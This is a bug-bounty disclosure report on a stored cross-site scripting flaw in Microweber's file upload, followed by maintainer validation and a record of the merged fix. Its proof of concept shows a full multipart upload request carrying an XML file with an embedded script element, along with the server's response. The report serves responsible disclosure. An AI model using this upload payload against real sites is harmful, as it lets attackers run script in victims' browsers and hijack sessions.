Cross-site scripting - Stored via upload ".xlr" file in microweber/microweber

Valid

Reported on

Jul 2nd 2022


Description

In file upload function, the server allow upload .xlr file with contain some javascript code lead to XSS.

Proof of Concept

REQUEST

POST /demo/plupload HTTP/1.1
Host: demo.microweber.org
Cookie: laravel_session=r768Tqzv8h0fkjgvKdofhxgmjcorT6pwuqMKJkIb; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=2%7CTtYWLvivLcGGOKkv5QqtzWhOA7vw6wZPZIbryyJKGsVNHLLfQ4n75QWDNFH8%7C%242y%2410%24114oPbqv.UAg3ca706prIuSTMe3pAc9qYqT2gOBR1uldB9UTk%2FlYu; back_to_admin=https%3A//demo.microweber.org/demo/admin/view%3Ashop/action%3Aproducts%23action%3Dnew%3Aproduct; csrf-token-data=%7B%22value%22%3A%22YbSQ8rVR4gKnhlneQm7raooqI7YrB7VZJGH6lLJX%22%2C%22expiry%22%3A1656778667013%7D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------80883503232369887683205133266
Content-Length: 959
Origin: https://demo.microweber.org
Referer: https://demo.microweber.org/demo/admin/view:shop/action:products
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Pwnfox-Color: red
Te: trailers
Connection: close

-----------------------------80883503232369887683205133266
Content-Disposition: form-data; name="name"

xss_poc.xlr
-----------------------------80883503232369887683205133266
Content-Disposition: form-data; name="chunk"

0
-----------------------------80883503232369887683205133266
Content-Disposition: form-data; name="chunks"

1
-----------------------------80883503232369887683205133266
Content-Disposition: form-data; name="file"; filename="blob"
Content-Type: application/octet-stream

<?xml version="1.0" encoding="UTF-8"?>
<html>
    <head></head>
    <body>
        <a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(window.origin)</a:script>
        <info>
          <name>
            <value>123</value>
          </name>
            <description>
              <value>Hello</value>
            </description>
            <url>
              <value>http://google.com</value>
            </url>
        </info>
    </body>
</html>
-----------------------------80883503232369887683205133266--

RESPONSE

HTTP/1.1 200 OK
Date: Sat, 02 Jul 2022 16:22:43 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Sat, 02 Jul 2022 16:22:44 GMT
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/json
Content-Length: 129

{"src":"https:\/\/demo.microweber.org\/demo\/userfiles\/media\/default\/xss-poc.xlr","name":"xss-poc.xlr","bytes_uploaded":"959"}

PoC Image

image

Impact

This vulnerability can be arbitrarily executed javascript code to perform HTTP request, CSRF, get content of same origin page, etc ...

We are processing your report and will contact the microweber team within 24 hours. a month ago
Nhien.IT modified the report
a month ago
Nhien.IT modified the report
a month ago
We have contacted a member of the microweber team and are waiting to hear back a month ago
Peter Ivanov modified the Severity from Medium to Low a month ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Peter Ivanov validated this vulnerability a month ago
Nhien.IT has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Peter Ivanov confirmed that a fix has been merged on 39797c a month ago
Peter Ivanov has been awarded the fix bounty
Files.php#L1161 has been validated
Peter Ivanov
a month ago

Maintainer


Thanks for the report. In order to upload the .xlr file you need to be logged as admin

Nhien.IT
a month ago

Researcher


Yah! Thank you, sir!

to join this conversation